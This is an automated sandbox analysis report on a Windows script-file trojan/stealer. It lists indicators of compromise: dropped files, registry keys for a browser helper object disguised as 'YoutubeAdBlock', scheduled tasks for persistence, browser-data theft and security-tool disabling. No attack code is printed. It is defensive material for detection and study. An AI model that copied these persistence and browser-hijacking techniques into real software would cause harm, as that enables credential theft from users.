c9704b81ede076637ffb9c981443620588c843475394f45769ea3e9743e54a0a

Analysis

max time kernel
63s
max time network
71s
platform
windows7_x64
resource
win7v20210408
submitted
09-06-2021 18:57

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

IvHUBr2n.wsf
Size

7KB
MD5

854655955fd6ad26285ad083cc413602
SHA1

e1e1a57d75ea1ef2bcaf37a7c04ed83face11add
SHA256

c9704b81ede076637ffb9c981443620588c843475394f45769ea3e9743e54a0a
SHA512

7b2061f9281050c9db6aa683735a57f11ec931c38cf627f11115ab2bac4596029030c7f529b0746c61a197353f240bb93a3ea654885d3dd47b6629a6661eb94d

Score

10^/10

adware discovery evasion persistence spyware stealer trojan

Malware Config

Signatures

Registers COM server for autorun 1 TTPs
persistence

Registry Run Keys / Startup Folder
T1060
Windows security bypass 2 TTPs
evasion trojan

Disabling Security Tools
T1089

Modify Registry
T1112
Blocklisted process makes network request 1 IoCs

Processes:

WScript.exe

flow pid process

2 1636 WScript.exe
Executes dropped EXE 2 IoCs

Processes:

wXcYjW.exeWIQirGE.exe

pid process

2040 wXcYjW.exe
888 WIQirGE.exe
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials in Files
T1081
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012
Installs/modifies Browser Helper Object 2 TTPs
BHOs are DLL modules which act as plugins for Internet Explorer.
stealer adware

Modify Registry
T1112

Browser Extensions
T1176

flow	pid	process
2	1636	WScript.exe

pid	process
2040	wXcYjW.exe
888	WIQirGE.exe

Drops file in System32 directory 9 IoCs

Processes:

powershell.exepowershell.exepowershell.exepowershell.exewXcYjW.exepowershell.exepowershell.exepowershell.EXE

description	ioc	process
File opened for modification	\??\c:\windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe
File opened for modification	\??\c:\windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe
File opened for modification	C:\Windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe
File opened for modification	\??\c:\windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe
File created	C:\Windows\system32\GroupPolicy\Machine\Registry.pol	wXcYjW.exe
File opened for modification	C:\Windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe
File opened for modification	C:\Windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe
File created	C:\Windows\system32\GroupPolicy\gpt.ini	wXcYjW.exe
File opened for modification	C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.EXE

Drops file in Program Files directory 64 IoCs

Processes:

wXcYjW.exe

description	ioc	process
File created	C:\Program Files (x86)\nvsfbntJuIE\files\_locales\sk\messages.json	wXcYjW.exe
File created	C:\Program Files (x86)\nvsfbntJuIE\files\_locales\te\messages.json	wXcYjW.exe
File created	C:\Program Files (x86)\XNgjElXjDPOU2\kJZnubkRvdVxB.dll	wXcYjW.exe
File created	C:\Program Files (x86)\nvsfbntJuIE\files\_locales\lv\messages.json	wXcYjW.exe
File created	C:\Program Files (x86)\nvsfbntJuIE\files\_locales\pt\messages.json	wXcYjW.exe
File created	C:\Program Files (x86)\nvsfbntJuIE\files\_locales\id\messages.json	wXcYjW.exe
File created	C:\Program Files (x86)\nvsfbntJuIE\files\_locales\mr\messages.json	wXcYjW.exe
File created	C:\Program Files (x86)\nvsfbntJuIE\files\_locales\ms\messages.json	wXcYjW.exe
File created	C:\Program Files (x86)\nvsfbntJuIE\files\Kernel.js	wXcYjW.exe
File created	C:\Program Files (x86)\nvsfbntJuIE\files\_locales\fil\messages.json	wXcYjW.exe
File created	C:\Program Files (x86)\nvsfbntJuIE\files\_locales\nl\messages.json	wXcYjW.exe
File created	C:\Program Files (x86)\nvsfbntJuIE\files\_locales\pl\messages.json	wXcYjW.exe
File created	C:\Program Files (x86)\MDxTggLfPzSwC\ATLZIpC.xml	wXcYjW.exe
File created	C:\Program Files (x86)\HthpyKCKweUn\LxZTTrL.dll	wXcYjW.exe
File created	C:\Program Files (x86)\nvsfbntJuIE\files\_locales\el\messages.json	wXcYjW.exe
File created	C:\Program Files (x86)\nvsfbntJuIE\files\_locales\fa\messages.json	wXcYjW.exe
File created	C:\Program Files (x86)\nvsfbntJuIE\files\_locales\kn\messages.json	wXcYjW.exe
File created	C:\Program Files (x86)\nvsfbntJuIE\files\_locales\no\messages.json	wXcYjW.exe
File created	C:\Program Files (x86)\nvsfbntJuIE\files\_locales\sq\messages.json	wXcYjW.exe
File created	C:\Program Files (x86)\nvsfbntJuIE\tykO4f0E.dll	wXcYjW.exe
File created	C:\Program Files (x86)\nvsfbntJuIE\files\_locales\be\messages.json	wXcYjW.exe
File created	C:\Program Files (x86)\nvsfbntJuIE\files\_locales\en\messages.json	wXcYjW.exe
File created	C:\Program Files (x86)\nvsfbntJuIE\files\_locales\sv\messages.json	wXcYjW.exe
File created	C:\Program Files (x86)\nvsfbntJuIE\files\_locales\sw\messages.json	wXcYjW.exe
File created	C:\Program Files (x86)\nvsfbntJuIE\files\_locales\tr\messages.json	wXcYjW.exe
File created	C:\Program Files (x86)\nvsfbntJuIE\files\_locales\es\messages.json	wXcYjW.exe
File created	C:\Program Files (x86)\nvsfbntJuIE\files\_locales\hi\messages.json	wXcYjW.exe
File created	C:\Program Files (x86)\nvsfbntJuIE\files\_locales\zh_CN\messages.json	wXcYjW.exe
File created	C:\Program Files (x86)\nvsfbntJuIE\files\_locales\zh_TW\messages.json	wXcYjW.exe
File opened for modification	C:\Program Files\Mozilla Firefox\browser\omni.ja	wXcYjW.exe
File created	C:\Program Files (x86)\nvsfbntJuIE\files\_locales\ml\messages.json	wXcYjW.exe
File created	C:\Program Files (x86)\nvsfbntJuIE\files\_locales\fr\messages.json	wXcYjW.exe
File created	C:\Program Files (x86)\nvsfbntJuIE\files\_locales\pt_PT\messages.json	wXcYjW.exe
File created	C:\Program Files (x86)\nvsfbntJuIE\files\_locales\sr\messages.json	wXcYjW.exe
File created	C:\Program Files (x86)\nvsfbntJuIE\files\_locales\vi\messages.json	wXcYjW.exe
File created	C:\Program Files (x86)\dPjFpxJDU\NosahBU.xml	wXcYjW.exe
File created	C:\Program Files (x86)\nvsfbntJuIE\files\_locales\ar\messages.json	wXcYjW.exe
File created	C:\Program Files (x86)\nvsfbntJuIE\files\_locales\en_US\messages.json	wXcYjW.exe
File created	C:\Program Files (x86)\nvsfbntJuIE\files\_locales\da\messages.json	wXcYjW.exe
File created	C:\Program Files (x86)\WmvPJtLIKNyrEpXovCR\kEuINvj.dll	wXcYjW.exe
File created	C:\Program Files (x86)\nvsfbntJuIE\files\_locales\pt_BR\messages.json	wXcYjW.exe
File created	C:\Program Files (x86)\nvsfbntJuIE\files\_locales\sl\messages.json	wXcYjW.exe
File created	C:\Program Files (x86)\nvsfbntJuIE\files\_locales\ta\messages.json	wXcYjW.exe
File created	C:\Program Files (x86)\MDxTggLfPzSwC\MdqUxjl.dll	wXcYjW.exe
File created	C:\Program Files\Mozilla Firefox\browser\omni.ja.bak	wXcYjW.exe
File created	C:\Program Files (x86)\nvsfbntJuIE\files\background.html	wXcYjW.exe
File created	C:\Program Files (x86)\nvsfbntJuIE\files\_locales\fi\messages.json	wXcYjW.exe
File created	C:\Program Files (x86)\nvsfbntJuIE\files\_locales\lt\messages.json	wXcYjW.exe
File created	C:\Program Files (x86)\nvsfbntJuIE\files\_locales\ro\messages.json	wXcYjW.exe
File created	C:\Program Files (x86)\XNgjElXjDPOU2\nuqkTDz.xml	wXcYjW.exe
File created	C:\Program Files (x86)\nvsfbntJuIE\files\_locales\ca\messages.json	wXcYjW.exe
File created	C:\Program Files (x86)\nvsfbntJuIE\files\_locales\et\messages.json	wXcYjW.exe
File created	C:\Program Files (x86)\nvsfbntJuIE\kDR5iO1hp.dll	wXcYjW.exe
File created	C:\Program Files (x86)\nvsfbntJuIE\files\_locales\bn\messages.json	wXcYjW.exe
File created	C:\Program Files (x86)\nvsfbntJuIE\files\_locales\ko\messages.json	wXcYjW.exe
File created	C:\Program Files (x86)\nvsfbntJuIE\files\_locales\hu\messages.json	wXcYjW.exe
File created	C:\Program Files (x86)\nvsfbntJuIE\files\_locales\th\messages.json	wXcYjW.exe
File created	C:\Program Files (x86)\nvsfbntJuIE\files\_locales\bg\messages.json	wXcYjW.exe
File created	C:\Program Files (x86)\nvsfbntJuIE\files\_locales\gu\messages.json	wXcYjW.exe
File created	C:\Program Files (x86)\nvsfbntJuIE\files\_locales\it\messages.json	wXcYjW.exe
File created	C:\Program Files (x86)\nvsfbntJuIE\files\_locales\mk\messages.json	wXcYjW.exe
File created	C:\Program Files\Mozilla Firefox\browser\features\{852F1A16-E055-4B63-9433-90EB9C056CD6}.xpi	wXcYjW.exe
File opened for modification	C:\Program Files\Mozilla Firefox\browser\features\{852F1A16-E055-4B63-9433-90EB9C056CD6}.xpi	wXcYjW.exe
File created	C:\Program Files (x86)\nvsfbntJuIE\files\_locales\en_GB\messages.json	wXcYjW.exe

Drops file in Windows directory 1 IoCs

Processes:

schtasks.exe

description ioc process

File created C:\Windows\Tasks\GvmHufwuHmOAaOC.job schtasks.exe
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082
Creates scheduled task(s) 1 TTPs 8 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
persistence

Scheduled Task
T1053

Processes:

schtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exe

pid process

1404 schtasks.exe
1096 schtasks.exe
1812 schtasks.exe
1484 schtasks.exe
1576 schtasks.exe
1296 schtasks.exe
856 schtasks.exe
1812 schtasks.exe

description	ioc	process
File created	C:\Windows\Tasks\GvmHufwuHmOAaOC.job	schtasks.exe

pid	process
1404	schtasks.exe
1096	schtasks.exe
1812	schtasks.exe
1484	schtasks.exe
1576	schtasks.exe
1296	schtasks.exe
856	schtasks.exe
1812	schtasks.exe

Modifies Internet Explorer settings 1 TTPs 20 IoCs

adware spyware

Modify Registry

T1112

Processes:

wXcYjW.exeWIQirGE.exe

description	ioc	process
Key deleted	\REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\Software\Microsoft\Internet Explorer\RECOVERY\ADMINACTIVE	wXcYjW.exe
Key created	\REGISTRY\MACHINE\Software\Wow6432Node\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{A3B4F7D2-7277-4E9A-A9A3-6CB544CCE5BE}	wXcYjW.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{A3B4F7D2-7277-4E9A-A9A3-6CB544CCE5BE}\AppPath = "C:\\Program Files (x86)\\nvsfbntJuIE"	wXcYjW.exe
Key created	\REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BROWSER_EMULATION	wXcYjW.exe
Key created	\REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\Software\Microsoft\Internet Explorer\Low Rights	wXcYjW.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\Software\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{A3B4F7D2-7277-4E9A-A9A3-6CB544CCE5BE}\AppName = "hhuVZrF.exe"	wXcYjW.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\Software\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{A3B4F7D2-7277-4E9A-A9A3-6CB544CCE5BE}\Policy = "3"	wXcYjW.exe
Key created	\REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch	WIQirGE.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{A3B4F7D2-7277-4E9A-A9A3-6CB544CCE5BE}\AppName = "hhuVZrF.exe"	wXcYjW.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{A3B4F7D2-7277-4E9A-A9A3-6CB544CCE5BE}\Policy = "3"	wXcYjW.exe
Key created	\REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\Software\Microsoft\Internet Explorer\MAIN	wXcYjW.exe
Key created	\REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\Software\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{A3B4F7D2-7277-4E9A-A9A3-6CB544CCE5BE}	wXcYjW.exe
Key created	\REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\SOFTWARE\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_BROWSER_EMULATION	wXcYjW.exe
Key created	\REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\Software\Microsoft\Internet Explorer\Main\FeatureControl	wXcYjW.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BROWSER_EMULATION\hhuVZrF.exe = "9999"	wXcYjW.exe
Key created	\REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\Software\Microsoft\Internet Explorer\Approved Extensions	wXcYjW.exe
Key created	\REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\Software\Microsoft\Internet Explorer\Low Rights\ElevationPolicy	wXcYjW.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\Software\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{A3B4F7D2-7277-4E9A-A9A3-6CB544CCE5BE}\AppPath = "C:\\Program Files (x86)\\nvsfbntJuIE"	wXcYjW.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\Software\Microsoft\Internet Explorer\Approved Extensions\{B7993E1A-469D-4CED-8208-B2E0791F4668} = 51667a6c4c1d3b1b0a228fabaf1687039d05f8a0785c0473	wXcYjW.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running"	WIQirGE.exe

Modifies registry class 64 IoCs

Processes:

wXcYjW.exe

description	ioc	process
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{BE395518-8F31-4D69-BF1E-BBF303203F45}\ProxyStubClsid32	wXcYjW.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{33CBD639-1F6A-4223-BBE4-58184E4ED9B3}\ProxyStubClsid32	wXcYjW.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{B7993E1A-469D-4CED-8208-B2E0791F4668}\Implemented Categories\	wXcYjW.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{BE395518-8F31-4D69-BF1E-BBF303203F45}\ = "_HxdbrcCxgGOTQlHbjmJIFOTFNh"	wXcYjW.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{33CBD639-1F6A-4223-BBE4-58184E4ED9B3}	wXcYjW.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{33CBD639-1F6A-4223-BBE4-58184E4ED9B3}\ = "IHAiMCmePWIJGScvZhXd"	wXcYjW.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{B7993E1A-469D-4CED-8208-B2E0791F4668}\Programmable\	wXcYjW.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{484C7844-4212-4BE0-A3B4-376E9752EB97}\1.0\0\win32	wXcYjW.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{B7993E1A-469D-4CED-8208-B2E0791F4668}\VersionIndependentProgID = "Toolbar.ExtensionHelperObject"	wXcYjW.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{B7993E1A-469D-4CED-8208-B2E0791F4668}\Programmable	wXcYjW.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{BE395518-8F31-4D69-BF1E-BBF303203F45}\TypeLib	wXcYjW.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{BE395518-8F31-4D69-BF1E-BBF303203F45}\TypeLib\ = "{949304BF-B0CB-4477-AB23-4FFC82B86902}"	wXcYjW.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{33CBD639-1F6A-4223-BBE4-58184E4ED9B3}\TypeLib	wXcYjW.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{33CBD639-1F6A-4223-BBE4-58184E4ED9B3}\TypeLib\Version = "1.0"	wXcYjW.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{B7993E1A-469D-4CED-8208-B2E0791F4668}\TypeLib = "{1D5A4199-956E-49BC-B89F-6A35C57C0D13}"	wXcYjW.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{B7993E1A-469D-4CED-8208-B2E0791F4668}\Implemented Categories\{59FB2056-D625-48D0-A944-1A85B5AB2640}	wXcYjW.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{FCD323B9-9E05-4433-8305-22E34A2FA3B9}\TypeLib	wXcYjW.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{A3B4F7D2-7277-4E9A-A9A3-6CB544CCE5BE}\Programmable	wXcYjW.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{33CBD639-1F6A-4223-BBE4-58184E4ED9B3}	wXcYjW.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{FCD323B9-9E05-4433-8305-22E34A2FA3B9}\TypeLib\ = "{484C7844-4212-4BE0-A3B4-376E9752EB97}"	wXcYjW.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{484C7844-4212-4BE0-A3B4-376E9752EB97}\1.0\HELPDIR	wXcYjW.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{B7993E1A-469D-4CED-8208-B2E0791F4668}\ProgID = "Toolbar.ExtensionHelperObject.1"	wXcYjW.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{B7993E1A-469D-4CED-8208-B2E0791F4668}\InprocServer32\ = "C:\\Program Files (x86)\\nvsfbntJuIE\\tykO4f0E.dll"	wXcYjW.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{FCD323B9-9E05-4433-8305-22E34A2FA3B9}\ProxyStubClsid32	wXcYjW.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{33CBD639-1F6A-4223-BBE4-58184E4ED9B3}\ProxyStubClsid32\ = "{00020424-0000-0000-C000-000000000046}"	wXcYjW.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{B7993E1A-469D-4CED-8208-B2E0791F4668}\InprocServer32	wXcYjW.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{FCD323B9-9E05-4433-8305-22E34A2FA3B9}\ = "{FCD323B9-9E05-4433-8305-22E34A2FA3B9}"	wXcYjW.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{A3B4F7D2-7277-4E9A-A9A3-6CB544CCE5BE}\LocalServer32\ = "C:\\Program Files (x86)\\nvsfbntJuIE\\hhuVZrF.exe"	wXcYjW.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{949304BF-B0CB-4477-AB23-4FFC82B86902}\1.0	wXcYjW.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{FCD323B9-9E05-4433-8305-22E34A2FA3B9}\TypeLib\Version = "1.0"	wXcYjW.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{484C7844-4212-4BE0-A3B4-376E9752EB97}\1.0	wXcYjW.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{484C7844-4212-4BE0-A3B4-376E9752EB97}	wXcYjW.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{FCD323B9-9E05-4433-8305-22E34A2FA3B9}	wXcYjW.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{A3B4F7D2-7277-4E9A-A9A3-6CB544CCE5BE}\ = "BackgroundScriptEngine Class"	wXcYjW.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{A3B4F7D2-7277-4E9A-A9A3-6CB544CCE5BE}\LocalServer32	wXcYjW.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{949304BF-B0CB-4477-AB23-4FFC82B86902}\1.0\0\win32	wXcYjW.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{BE395518-8F31-4D69-BF1E-BBF303203F45}\TypeLib\Version = "1.0"	wXcYjW.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{BE395518-8F31-4D69-BF1E-BBF303203F45}\ProxyStubClsid32\ = "{00020420-0000-0000-C000-000000000046}"	wXcYjW.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{B7993E1A-469D-4CED-8208-B2E0791F4668}\Implemented Categories\{59FB2056-D625-48D0-A944-1A85B5AB2640}	wXcYjW.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{B7993E1A-469D-4CED-8208-B2E0791F4668}\ = "YoutubeAdBlock"	wXcYjW.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{A3B4F7D2-7277-4E9A-A9A3-6CB544CCE5BE}	wXcYjW.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{BE395518-8F31-4D69-BF1E-BBF303203F45}\ProxyStubClsid32\ = "{00020420-0000-0000-C000-000000000046}"	wXcYjW.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{33CBD639-1F6A-4223-BBE4-58184E4ED9B3}\TypeLib\ = "{949304BF-B0CB-4477-AB23-4FFC82B86902}"	wXcYjW.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{FCD323B9-9E05-4433-8305-22E34A2FA3B9}\ProxyStubClsid	wXcYjW.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{FCD323B9-9E05-4433-8305-22E34A2FA3B9}\ProxyStubClsid\ = "{00020424-0000-0000-C000-000000000046}"	wXcYjW.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{FCD323B9-9E05-4433-8305-22E34A2FA3B9}\ProxyStubClsid32\ = "{00020424-0000-0000-C000-000000000046}"	wXcYjW.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{FCD323B9-9E05-4433-8305-22E34A2FA3B9}\TypeLib\ = "{484C7844-4212-4BE0-A3B4-376E9752EB97}"	wXcYjW.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{949304BF-B0CB-4477-AB23-4FFC82B86902}\1.0\FLAGS	wXcYjW.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{949304BF-B0CB-4477-AB23-4FFC82B86902}\1.0\0	wXcYjW.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{FCD323B9-9E05-4433-8305-22E34A2FA3B9}\ProxyStubClsid32\ = "{00020424-0000-0000-C000-000000000046}"	wXcYjW.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{B7993E1A-469D-4CED-8208-B2E0791F4668}	wXcYjW.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{B7993E1A-469D-4CED-8208-B2E0791F4668}\Implemented Categories	wXcYjW.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{484C7844-4212-4BE0-A3B4-376E9752EB97}\1.0\HELPDIR\ = "C:\\Program Files (x86)\\nvsfbntJuIE\\"	wXcYjW.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{A3B4F7D2-7277-4E9A-A9A3-6CB544CCE5BE}\Programmable\	wXcYjW.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{BE395518-8F31-4D69-BF1E-BBF303203F45}\ProxyStubClsid32	wXcYjW.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{BE395518-8F31-4D69-BF1E-BBF303203F45}\TypeLib\Version = "1.0"	wXcYjW.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{33CBD639-1F6A-4223-BBE4-58184E4ED9B3}\ = "IHAiMCmePWIJGScvZhXd"	wXcYjW.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{33CBD639-1F6A-4223-BBE4-58184E4ED9B3}\TypeLib\Version = "1.0"	wXcYjW.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{B7993E1A-469D-4CED-8208-B2E0791F4668}\Implemented Categories	wXcYjW.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{B7993E1A-469D-4CED-8208-B2E0791F4668}\Programmable	wXcYjW.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{B7993E1A-469D-4CED-8208-B2E0791F4668}\Implemented Categories\{59FB2056-D625-48D0-A944-1A85B5AB2640}\	wXcYjW.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{BE395518-8F31-4D69-BF1E-BBF303203F45}\TypeLib	wXcYjW.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{33CBD639-1F6A-4223-BBE4-58184E4ED9B3}\ProxyStubClsid32	wXcYjW.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{33CBD639-1F6A-4223-BBE4-58184E4ED9B3}\TypeLib	wXcYjW.exe

Script User-Agent 1 IoCs
Uses user-agent string associated with script host/environment.

Processes:

description flow ioc

HTTP User-Agent header 2 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)

description	flow	ioc
HTTP User-Agent header	2	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)

Suspicious behavior: EnumeratesProcesses 29 IoCs

Processes:

powershell.exepowershell.EXEpowershell.exepowershell.exewXcYjW.exepowershell.exepowershell.exepowershell.exe

pid	process
1524	powershell.exe
1524	powershell.exe
856	powershell.EXE
1764	powershell.exe
1764	powershell.exe
1240	powershell.exe
1240	powershell.exe
2040	wXcYjW.exe
2040	wXcYjW.exe
2040	wXcYjW.exe
2040	wXcYjW.exe
2040	wXcYjW.exe
2040	wXcYjW.exe
2040	wXcYjW.exe
2040	wXcYjW.exe
2040	wXcYjW.exe
2040	wXcYjW.exe
2040	wXcYjW.exe
2040	wXcYjW.exe
2040	wXcYjW.exe
2040	wXcYjW.exe
2040	wXcYjW.exe
1596	powershell.exe
1596	powershell.exe
2036	powershell.exe
2036	powershell.exe
1844	powershell.exe
1844	powershell.exe
2040	wXcYjW.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

Processes:

powershell.exeWMIC.exepowershell.EXEpowershell.exeWMIC.exepowershell.exeWMIC.exe

description	pid	process
Token: SeDebugPrivilege	1524	powershell.exe
Token: SeIncreaseQuotaPrivilege	1816	WMIC.exe
Token: SeSecurityPrivilege	1816	WMIC.exe
Token: SeTakeOwnershipPrivilege	1816	WMIC.exe
Token: SeLoadDriverPrivilege	1816	WMIC.exe
Token: SeSystemProfilePrivilege	1816	WMIC.exe
Token: SeSystemtimePrivilege	1816	WMIC.exe
Token: SeProfSingleProcessPrivilege	1816	WMIC.exe
Token: SeIncBasePriorityPrivilege	1816	WMIC.exe
Token: SeCreatePagefilePrivilege	1816	WMIC.exe
Token: SeBackupPrivilege	1816	WMIC.exe
Token: SeRestorePrivilege	1816	WMIC.exe
Token: SeShutdownPrivilege	1816	WMIC.exe
Token: SeDebugPrivilege	1816	WMIC.exe
Token: SeSystemEnvironmentPrivilege	1816	WMIC.exe
Token: SeRemoteShutdownPrivilege	1816	WMIC.exe
Token: SeUndockPrivilege	1816	WMIC.exe
Token: SeManageVolumePrivilege	1816	WMIC.exe
Token: 33	1816	WMIC.exe
Token: 34	1816	WMIC.exe
